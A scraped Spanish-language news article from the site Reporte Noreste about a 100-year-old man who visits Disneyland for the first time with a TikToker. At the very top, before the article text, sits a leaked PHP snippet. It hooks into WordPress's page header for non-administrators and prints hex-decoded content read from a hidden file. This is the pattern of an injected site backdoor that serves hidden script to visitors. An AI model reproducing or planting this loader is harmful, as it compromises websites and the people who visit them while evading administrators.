if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Viral: Hombre de cien años conoce Disneyland por primera vez en su vida – Reporte Noreste
Conéctate con nosotros

CYEN

Viral: Hombre de cien años conoce Disneyland por primera vez en su vida

Viral: Hombre de cien años conoce Disneyland por primera vez en su vida

Estados Unidos.- Un hombre de cien años de edad conmovió a las redes sociales tras viralizarse el video en el que «como un niño» disfruta de su primera visita al parque de diversiones Disneyland.

Todo comenzó cuando el tiktoker Isaiah Garza invitaba a personas al azar a que lo acompañaran al parque Disney, al preguntarle al hombre de cien años de edad, este sin pensarlo le dijo que sí y así iniciaron el viaje de lo que el abuelito llamaría «uno de los mejores días de su vida».

Según el video, el anciano disfrutó de su primera vez en el parque subiéndose a las tazas giratorias, poniéndose orejas de Minnie y recorrió el parque en su silla de ruedas.

«Es uno de los mejores días de mi vida. Siento como si estuviera en sueño o algo parecido», indicó emocionado el hombre quien dijo que por su edad pensaba que nunca conocería el parque.

Por su parte el tiktoker Isaiah Garza indicó «Nos convertimos en los mejores amigos en este día».

El video rápidamente se hizo viral y recibió cientos de comentarios positivos por el gesto del joven hacia el abuelito.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en CYEN